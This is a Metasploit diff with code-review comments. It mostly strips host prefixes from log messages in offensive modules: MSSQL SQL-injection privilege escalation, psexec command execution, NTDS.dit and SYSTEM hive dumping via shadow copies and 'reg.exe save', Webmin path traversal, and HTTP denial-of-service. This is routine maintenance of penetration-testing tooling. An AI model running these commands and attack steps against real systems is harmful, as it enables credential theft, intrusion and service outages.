@@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary @credentials.each do |k,v| next unless v[:user] and v[:password] - print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + print_status("#{k}: User: #{v[:user]} Pass: #{v[:password]}") report_cred( ip: rhost, port: rport, @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{peer} - #{regex[0]}: #{value}") + print_status("#{regex[0]}: #{value}") end end end diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 83a8d2d1ec..dc6b36654f 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb 
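Review bot: In the `@@ -239,7` hunk the captured value is read from the global `$1` after `config.match(regex[1])`, which silently breaks if another regexp call is ever added between the two lines. Keep the MatchData instead: `if (m = config.match(regex[1]))` followed by `print_status("#{regex[0]}: #{m[1]}")`. In the `@@ -222,7` hunk, `next unless v[:user] and v[:password]` would be safer with `&&`, which has the precedence a reader expects.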
@@ -39,49 +39,49 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Grabbing the SQL Server name and domain...") + print_status("Grabbing the SQL Server name and domain...") db_server_name = get_server_name if db_server_name.nil? - print_error("#{peer} - Unable to grab the server name") + print_error("Unable to grab the server name") return else - print_good("#{peer} - Server name: #{db_server_name}") + print_good("Server name: #{db_server_name}") end db_domain_name = get_domain_name if db_domain_name.nil? - print_error("#{peer} - Unable to grab domain name") + print_error("Unable to grab domain name") return end # Check if server is on a domain if db_server_name == db_domain_name - print_error("#{peer} - The SQL Server does not appear to be part of a Windows domain") + print_error("The SQL Server does not appear to be part of a Windows domain") return else - print_good("#{peer} - Domain name: #{db_domain_name}") + print_good("Domain name: #{db_domain_name}") end - print_status("#{peer} - Grabbing the SID for the domain...") + print_status("Grabbing the SID for the domain...") windows_domain_sid = get_windows_domain_sid(db_domain_name) if windows_domain_sid.nil? - print_error("#{peer} - Could not recover the SQL Server's domain sid.") + print_error("Could not recover the SQL Server's domain sid.") return else - print_good("#{peer} - Domain sid: #{windows_domain_sid}") + print_good("Domain sid: #{windows_domain_sid}") end # Get a list of windows users, groups, and computer accounts using SUSER_NAME() total_rids = datastore['END_RID'] - datastore['START_RID'] - print_status("#{peer} - Brute forcing #{total_rids} RIDs via SQL injection, be patient...") + print_status("Brute forcing #{total_rids} RIDs via SQL injection, be patient...") domain_users = get_win_domain_users(windows_domain_sid) if domain_users.nil? 
- print_error("#{peer} - Sorry, no Windows domain accounts were found, or DC could not be contacted.") + print_error("Sorry, no Windows domain accounts were found, or DC could not be contacted.") return end # Print number of objects found and write to a file - print_good("#{peer} - #{domain_users.length} user accounts, groups, and computer accounts were found.") + print_good("#{domain_users.length} user accounts, groups, and computer accounts were found.") # Create table for report windows_domain_login_table = Rex::Ui::Text::Table.new( @@ -179,7 +179,7 @@ class Metasploit3 < Msf::Auxiliary (datastore['START_RID']..datastore['END_RID']).each do |principal_id| rid_diff = principal_id - datastore['START_RID'] if principal_id % 100 == 0 - print_status("#{peer} - #{rid_diff} of #{total_rids } RID queries complete") + print_status("#{rid_diff} of #{total_rids } RID queries complete") end user_sid = build_user_sid(domain_sid, principal_id) @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Auxiliary unless windows_login.empty? || windows_logins.include?(windows_login) windows_logins.push(windows_login) - print_good("#{peer} - #{windows_login}") + print_good(" #{windows_login}") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index 320c1850a6..95bc7a1694 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb 
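Review bot: `total_rids = datastore['END_RID'] - datastore['START_RID']` in `run` undercounts by one, because the loop in the `@@ -179,7` hunk walks the inclusive range `(datastore['START_RID']..datastore['END_RID'])`. The "Brute forcing ... RIDs" message and the "... of ... RID queries complete" progress line therefore never match the number of queries actually sent. Use `total_rids = datastore['END_RID'] - datastore['START_RID'] + 1`. The method containing the progress line starts outside its hunk, so check that the `total_rids` it prints is computed the same way.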
@@ -30,62 +30,62 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name from ...") + print_status("Grabbing the database user name from ...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no esclation needed.") + print_error("#{db_user} is already a sysadmin, no esclation needed.") return else - print_good("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_good("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Check for trusted databases owned by sysadmins - print_status("#{peer} - Checking for trusted databases owned by sysadmins...") + print_status("Checking for trusted databases owned by sysadmins...") trust_db_list = check_trust_dbs if trust_db_list.nil? 
|| trust_db_list.length == 0 - print_error("#{peer} - No databases owned by sysadmin were found flagged as trustworthy.") + print_error("No databases owned by sysadmin were found flagged as trustworthy.") return else # Display list of accessible databases to user - print_good("#{peer} - #{trust_db_list.length} affected database(s) were found:") + print_good("#{trust_db_list.length} affected database(s) were found:") trust_db_list.each do |db| print_status(" - #{db}") end end # Check if the user has the db_owner role in any of the databases - print_status("#{peer} - Checking if #{db_user} has the db_owner role in any of them...") + print_status("Checking if #{db_user} has the db_owner role in any of them...") owner_status = check_db_owner(trust_db_list) if owner_status.nil? - print_error("#{peer} - Fail buckets, the user doesn't have db_owner role anywhere.") + print_error("Fail buckets, the user doesn't have db_owner role anywhere.") return else - print_good("#{peer} - #{db_user} has the db_owner role on #{owner_status}.") + print_good("#{db_user} has the db_owner role on #{owner_status}.") end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to add #{db_user} to sysadmin role...") + print_status("Attempting to add #{db_user} to sysadmin role...") escalate_privs(owner_status, db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 346efa1109..9a4493717f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb 
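Review bot: Two of the rewritten messages in `run` still carry text defects: `no esclation needed.` is misspelled, and `Grabbing the database user name from ...` ends in a dangling "from". The sibling module mssql_escalate_execute_as_sqli.rb prints `Grabbing the database user name...` and `no escalation needed.` for the same steps, so the two should read alike. Suggested lines: `print_status("Grabbing the database user name...")` and `print_error("#{db_user} is already a sysadmin, no escalation needed.")`.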
@@ -28,60 +28,60 @@ class Metasploit3 < Msf::Auxiliary def run # Get the database user name - print_status("#{peer} - Grabbing the database user name...") + print_status("Grabbing the database user name...") db_user = get_username if db_user.nil? - print_error("#{peer} - Unable to grab user name...") + print_error("Unable to grab user name...") return else - print_good("#{peer} - Database user: #{db_user}") + print_good("Database user: #{db_user}") end # Grab sysadmin status - print_status("#{peer} - Checking if #{db_user} is already a sysadmin...") + print_status("Checking if #{db_user} is already a sysadmin...") admin_status = check_sysadmin if admin_status.nil? - print_error("#{peer} - Couldn't retrieve user status, aborting...") + print_error("Couldn't retrieve user status, aborting...") return elsif admin_status == '1' - print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.") + print_error("#{db_user} is already a sysadmin, no escalation needed.") return else - print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.") + print_status("#{db_user} is NOT a sysadmin, let's try to escalate privileges.") end # Get list of users that can be impersonated - print_status("#{peer} - Enumerating a list of users that can be impersonated...") + print_status("Enumerating a list of users that can be impersonated...") imp_user_list = check_imp_users if imp_user_list.nil? || imp_user_list.empty? 
- print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.") + print_error("Sorry, the current user doesnt have permissions to impersonate anyone.") return else # Display list of users that can be impersonated - print_good("#{peer} - #{imp_user_list.length} users can be impersonated:") + print_good("#{imp_user_list.length} users can be impersonated:") imp_user_list.each do |dbuser| - print_status("#{peer} - #{dbuser}") + print_status(" #{dbuser}") end end # Check if any of the users that can be impersonated are sysadmins - print_status("#{peer} - Checking if any of them are sysadmins...") + print_status("Checking if any of them are sysadmins...") imp_user_sysadmin = check_imp_sysadmin(imp_user_list) if imp_user_sysadmin.nil? - print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.") + print_error("Sorry, none of the users that can be impersonated are sysadmins.") return end # Attempt to escalate to sysadmin - print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...") + print_status("Attempting to impersonate #{imp_user_sysadmin}...") escalate_privs(imp_user_sysadmin,db_user) admin_status = check_sysadmin if admin_status && admin_status == '1' - print_good("#{peer} - Success! #{db_user} is now a sysadmin!") + print_good("Success! #{db_user} is now a sysadmin!") else - print_error("#{peer} - Fail buckets, something went wrong.") + print_error("Fail buckets, something went wrong.") end end @@ -179,10 +179,10 @@ class Metasploit3 < Msf::Auxiliary # check if user is a sysadmin if parsed_result && parsed_result[0] == '1' - print_good("#{peer} - #{imp_user} is a sysadmin!") + print_good(" #{imp_user} is a sysadmin!") return imp_user else - print_status("#{peer} - #{imp_user} is NOT a sysadmin") + print_status(" #{imp_user} is NOT a sysadmin") end end 
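Review bot: The final check in `run`, `if admin_status && admin_status == '1'`, carries a redundant guard: `nil == '1'` is already false, so `if admin_status == '1'` behaves the same. The same expression closes `run` in the mssql_escalate_dbowner_sqli.rb hunk. Separately, `doesnt` in the impersonation error message should be `doesn't`.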
diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 7e77949291..684d043437 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Exploiting sqli to extract users information...") + print_status("Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) rand = Rex::Text.rand_text_numeric(2) separator = Rex::Text.rand_text_alpha(5 + rand(5)) @@ -134,21 +134,21 @@ class Metasploit3 < Msf::Auxiliary data = do_sqli(injection, mark) if data.blank? - print_error("#{peer} - Error exploiting sqli") + print_error("Error exploiting sqli") return end @users = [] @plain_passwords = [] - print_status("#{peer} - Parsing extracted data...") + print_status("Parsing extracted data...") parse_users(data, mark, separator) if @users.empty? - print_error("#{peer} - Users not found") + print_error("Users not found") return else - print_good("#{peer} - #{@users.length} users found!") + print_good("#{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 749b32d22e..77c3daa7f0 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue Rex::Proto::SMB::Exceptions::Error => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end res = execute_command(text, bat) 
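Review bot: In the `@@ -119,7` hunk, `rand = Rex::Text.rand_text_numeric(2)` creates a local named `rand`, and the very next line calls `rand(5)`. Ruby resolves a call with parentheses and an argument to `Kernel#rand`, so the code works, but a reader has to know that rule to trust it. Rename the local, e.g. `rand_num = Rex::Text.rand_text_numeric(2)`, and update its later uses, which fall outside the hunk.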
@@ -96,31 +96,31 @@ class Metasploit3 < Msf::Auxiliary def execute_command(text, bat) # Try and execute the provided command execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" - print_status("#{peer} - Executing the command...") + print_status("Executing the command...") begin return psexec(execute) rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3) - print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") + print_error("Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command def get_output(file) - print_status("#{peer} - Getting the command output...") + print_status("Getting the command output...") output = smb_read_file(@smbshare, @ip, file) if output.nil? - print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") + print_error("Error getting command output. #{$!.class}. #{$!}.") return end if output.empty? - print_status("#{peer} - Command finished with no output") + print_status("Command finished with no output") return end # Report output - print_good("#{peer} - Command completed successfuly!") + print_good("Command completed successfuly!") vprint_status("Output for \"#{datastore['COMMAND']}\":") vprint_line("#{output}") @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary fd = smb_open(file, 'rwo') fd.close rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror - print_status("#{peer} - Unable to get handle: #{accesserror}") + print_status("Unable to get handle: #{accesserror}") return false end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") 
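Review bot: The rescue in `execute_command` binds the exception as `exec_command_error`, but the `elog` call on the next line reads `e.class`, `e.message` and `e.backtrace`. Unless `e` is defined somewhere outside the hunk, that raises `NameError` inside the handler, and the `print_error` and `return false` below it never run. Use the bound name: `elog("#{exec_command_error.class} #{exec_command_error.message}\n#{exec_command_error.backtrace * "\n"}", 'rex', LEV_3)`. In `get_output`, `$!` is read outside any rescue, so it is probably `nil` there and the interpolation adds nothing to the message.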
@@ -155,19 +155,19 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin smb_file_rm(file) rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end end diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index dc1fd03215..ed89e046a5 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Auxiliary begin smb_login rescue StandardError => autherror - print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") + print_error("Unable to authenticate with given credentials: #{autherror}") return end # If a VSC was specified then don't try and create one if datastore['VSCPATH'].length > 0 - print_status("#{peer} - Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") + print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}") vscpath = datastore['VSCPATH'] else unless datastore['CREATE_NEW_VSC'] == true 
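Review bot: `left = files.collect{ |f| smb_file_exist?(f) }` in `cleanup_after` builds an array of the predicate's results rather than of file names, so the manual-cleanup message prints values like `true, false` instead of the paths that remain. Use `left = files.select { |f| smb_file_exist?(f) }`, which keeps both `left.any?` and `left.join(", ")` meaningful. The `cleanup_after` in psexec_ntdsgrab.rb (hunk `@@ -237,21`) has the same line.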
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary download_ntds((datastore['WINPATH'] + "\\Temp\\ntds")) download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys")) else - print_error("#{peer} - Failed to find a volume shadow copy. Issuing cleanup command sequence.") + print_error("Failed to find a volume shadow copy. Issuing cleanup command sequence.") end end cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys") @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary # then creating a new one def check_vss(text, bat) begin - print_status("#{peer} - Checking if a Volume Shadow Copy exists already.") + print_status("Checking if a Volume Shadow Copy exists already.") prepath = '\\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy' command = "%COMSPEC% /C echo vssadmin list shadows ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" result = psexec(command) @@ -102,14 +102,14 @@ class Metasploit3 < Msf::Auxiliary vscs = [] data.each_line { |line| vscs << line if line.include?("GLOBALROOT") } if vscs.empty? - print_status("#{peer} - No VSC Found.") + print_status("No VSC Found.") return nil end vscpath = prepath + vscs[vscs.length - 1].to_s.split("ShadowCopy")[1].to_s.chomp - print_good("#{peer} - Volume Shadow Copy exists on #{vscpath}") + print_good("Volume Shadow Copy exists on #{vscpath}") return vscpath rescue StandardError => vsscheckerror - print_error("#{peer} - Unable to determine if VSS is enabled: #{vsscheckerror}") + print_error("Unable to determine if VSS is enabled: #{vsscheckerror}") return nil end end 
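Review bot: In `check_vss` (hunk `@@ -102,14`), `vscs[vscs.length - 1].to_s` is the long form of `vscs.last`. The `vscs.empty?` return just above guarantees a last element, and the elements come from `each_line`, so the first `.to_s` is not needed. `vscpath = prepath + vscs.last.split("ShadowCopy")[1].to_s.chomp` says the same thing more directly.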
@@ -120,16 +120,16 @@ class Metasploit3 < Msf::Auxiliary begin #Try to create the shadow copy command = "%COMSPEC% /C echo #{createvsc} ^> #{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Creating Volume Shadow Copy") + print_status("Creating Volume Shadow Copy") out = psexec(command) #Get path to Volume Shadow Copy vscpath = get_vscpath(text) rescue StandardError => vscerror - print_error("#{peer} - Unable to create the Volume Shadow Copy: #{vscerror}") + print_error("Unable to create the Volume Shadow Copy: #{vscerror}") return nil end if vscpath - print_good("#{peer} - Volume Shadow Copy created on #{vscpath}") + print_good("Volume Shadow Copy created on #{vscpath}") return vscpath else return nil @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Auxiliary end return true rescue StandardError => ntdscopyerror - print_error("#{peer} - Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") + print_error("Unable to copy ntds.dit from Volume Shadow Copy.Make sure target is a Windows Domain Controller: #{ntdscopyerror}") return false end end @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Auxiliary # Checks if ntds.dit was copied to the Windows Temp directory def check_ntds(text) - print_status("#{peer} - Checking if NTDS.dit was copied.") + print_status("Checking if NTDS.dit was copied.") check = "%COMSPEC% /C dir \\#{datastore['WINPATH']}\\Temp\\ntds > #{text}" run = psexec(check) output = smb_read_file(@smbshare, @ip, text) @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Auxiliary command = "%COMSPEC% /C reg.exe save HKLM\\SYSTEM %WINDIR%\\Temp\\sys /y" return psexec(command) rescue StandardError => hiveerror - print_error("#{peer} - Unable to copy the SYSTEM hive file: #{hiveerror}") + print_error("Unable to copy the SYSTEM hive file: #{hiveerror}") return false end end 
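Review bot: In the `@@ -120,16` hunk, `out = psexec(command)` assigns a local that is never read in the visible lines, and the closing `if vscpath ... return vscpath else return nil` effectively returns `vscpath` either way. Call `psexec(command)` without the assignment and end the method with `print_good("Volume Shadow Copy created on #{vscpath}") if vscpath` followed by `vscpath`. `run = psexec(check)` in the `@@ -156,7` hunk is likewise unused there and reuses the name of the module's `run` method. Both method signatures lie outside the hunks.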
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Auxiliary # Download the ntds.dit copy to your attacking machine def download_ntds(file) - print_status("#{peer} - Downloading ntds.dit file") + print_status("Downloading ntds.dit file") begin # Try to download ntds.dit simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -190,9 +190,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close ntds_path = store_loot("psexec.ntdsgrab.ntds", "application/octet-stream", @ip, data, "ntds.dit") - print_good("#{peer} - ntds.dit stored at #{ntds_path}") + print_good("ntds.dit stored at #{ntds_path}") rescue StandardError => ntdsdownloaderror - print_error("#{peer} - Unable to downlaod ntds.dit: #{ntdsdownloaderror}") + print_error("Unable to downlaod ntds.dit: #{ntdsdownloaderror}") return ntdsdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary # Download the SYSTEM hive copy to your attacking machine def download_sys_hive(file) - print_status("#{peer} - Downloading SYSTEM hive file") + print_status("Downloading SYSTEM hive file") begin # Try to download SYSTEM hive simple.connect("\\\\#{@ip}\\#{@smbshare}") @@ -209,9 +209,9 @@ class Metasploit3 < Msf::Auxiliary data = remotefile.read remotefile.close hive_path = store_loot("psexec.ntdsgrab.hive", "application/octet-stream", @ip, data, "system-hive") - print_good("#{peer} - SYSTEM hive stored at #{hive_path}") + print_good("SYSTEM hive stored at #{hive_path}") rescue StandardError => sysdownloaderror - print_error("#{peer} - Unable to download SYSTEM hive: #{sysdownloaderror}") + print_error("Unable to download SYSTEM hive: #{sysdownloaderror}") return sysdownloaderror end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") 
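Review bot: In `download_ntds` (hunk `@@ -190,9`) and `download_sys_hive` (hunk `@@ -209,9`), the rescue branch returns before `simple.disconnect(...)` runs, so a failed read leaves the share connection open; `remotefile.close` is skipped too if `read` raises. Move the disconnect into an `ensure` clause: `ensure` followed by `simple.disconnect("\\\\#{@ip}\\#{@smbshare}")`. The rescue also returns the exception object, which is truthy, so a caller that tests the result cannot tell failure from success. `downlaod` in the error message is a typo for `download`.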
@@ -229,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary end return prepath + vsc.split("ShadowCopy")[1].chomp rescue StandardError => vscpath_error - print_error("#{peer} - Could not determine the exact path to the VSC check your WINPATH") + print_error("Could not determine the exact path to the VSC check your WINPATH") return nil end end @@ -237,21 +237,21 @@ class Metasploit3 < Msf::Auxiliary # Removes files created during execution. def cleanup_after(*files) simple.connect("\\\\#{@ip}\\#{@smbshare}") - print_status("#{peer} - Executing cleanup...") + print_status("Executing cleanup...") files.each do |file| begin if smb_file_exist?(file) smb_file_rm(file) end rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror - print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") + print_error("Unable to cleanup #{file}. Error: #{cleanuperror}") end end left = files.collect{ |f| smb_file_exist?(f) } if left.any? - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") else - print_status("#{peer} - Cleanup was successful") + print_status("Cleanup was successful") end simple.disconnect("\\\\#{@ip}\\#{@smbshare}") end diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 4381c2addd..77e2f3a893 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{rhost}:#{rport}" - print_status("#{peer} - Attempting to login...") + print_status("Attempting to login...") data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" 
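Review bot: With every `#{peer}` interpolation removed from this file's messages, the local `peer = "#{rhost}:#{rport}"` kept as context in the webmin `@@ -56,7` hunk looks unused; delete it unless code outside the visible hunks still reads it. On the line below it, `datastore['USERNAME']` and `datastore['PASSWORD']` are pasted into the form body unencoded, so a value containing `&`, `=` or `%` corrupts the request. Encode both values, e.g. `"page=%2F&user=#{Rex::Text.uri_encode(datastore['USERNAME'])}&pass=#{Rex::Text.uri_encode(datastore['PASSWORD'])}"`.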
@@ -71,17 +71,17 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 302 and res.get_cookies =~ /sid/ session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || '' if session and not session.empty? - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end else - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status("#{peer} - Attempting to retrieve #{datastore['RPATH']}...") + print_status("Attempting to retrieve #{datastore['RPATH']}...") traversal = "../" * datastore['DEPTH'] traversal << datastore['RPATH'] @@ -98,9 +98,9 @@ class Metasploit3 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RPATH']) path = store_loot('webmin.file', 'application/octet-stream', rhost, loot, f, datastore['RPATH']) - print_status("#{peer} - #{datastore['RPATH']} saved in #{path}") + print_status("#{datastore['RPATH']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file") + print_error("Failed to retrieve the file") return end diff --git a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb index 28542774fb..f40516c242 100644 --- a/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb +++ b/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb @@ -67,7 +67,7 @@ class Metasploit4 < Msf::Auxiliary c.send_request(r) # Don't wait for a response rescue ::Rex::ConnectionError => exception - print_error("#{peer} - Unable to connect: '#{exception.message}'") + print_error("Unable to connect: '#{exception.message}'") return ensure disconnect(c) if c diff --git a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb index e935e91cc2..cdc449f22d 100644 --- a/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb 
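Review bot: In the webmin `@@ -71,17` hunk, `if session and not session.empty?` uses the low-precedence `and`/`not` keywords, and the nil test is redundant because `session` falls back to `''` on the line above. `if !session.empty?` is enough; the outer `if res and res.code == 302 and ...` would read better with `&&` as well. The two identical `Authentication failed` branches could then be merged into a single guard, but that is optional.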
+++ b/modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb @@ -56,27 +56,27 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi('method' => 'GET', 'uri' => '/') unless res - print_error("#{peer} - No answer from the BigIP server") + print_error("No answer from the BigIP server") return end # Simple test based on HTTP Server header to detect BigIP virtual server server = res.headers['Server'] unless server =~ /BIG\-IP/ || server =~ /BigIP/ || force_attack - print_error("#{peer} - BigIP virtual server was not detected. Please check options") + print_error("BigIP virtual server was not detected. Please check options") return end - print_status("#{peer} - Starting DoS attack") + print_status("Starting DoS attack") # Start attack limit.times do |step| if step % 100 == 0 - print_status("#{peer} - #{step * 100 / limit}% accomplished...") + print_status("#{step * 100 / limit}% accomplished...") end res = send_request_cgi('method' => 'GET', 'uri' => '/') if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/ - print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.") + print_good("DoS accomplished: The maximum number of concurrent user sessions has been reached.") return end end 
@@ -84,18 +84,18 @@ class Metasploit3 < Msf::Auxiliary # Check if attack has failed res = send_request_cgi('method' => 'GET', 'uri' => uri) if res.headers['Location'] =~ /\/my.policy/ - print_error("#{peer} - DoS attack failed. Try to increase the RLIMIT") + print_error("DoS attack failed. Try to increase the RLIMIT") else - print_status("#{peer} - Result is undefined. Try to manually determine DoS attack result") + print_status("Result is undefined. Try to manually determine DoS attack result") end rescue ::Errno::ECONNRESET - print_error("#{peer} - The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") + print_error("The connection was reset. Maybe BigIP 'Max In Progress Sessions Per Client IP' counter was reached") rescue ::Rex::ConnectionRefused - print_error("#{peer} - Unable to connect to BigIP") + print_error("Unable to connect to BigIP") rescue ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect to BigIP. Please check options") + print_error("Unable to connect to BigIP. Please check options") rescue ::OpenSSL::SSL::SSLError - print_error("#{peer} - SSL/TLS connection error") + print_error("SSL/TLS connection error") end end diff --git a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb index b69b8872f1..165a9d582e 100644 --- a/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb +++ b/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else - print_status("#{peer} - Probably not vulnerable, will not dos it.") + print_status("Probably not vulnerable, will not dos it.") end end 
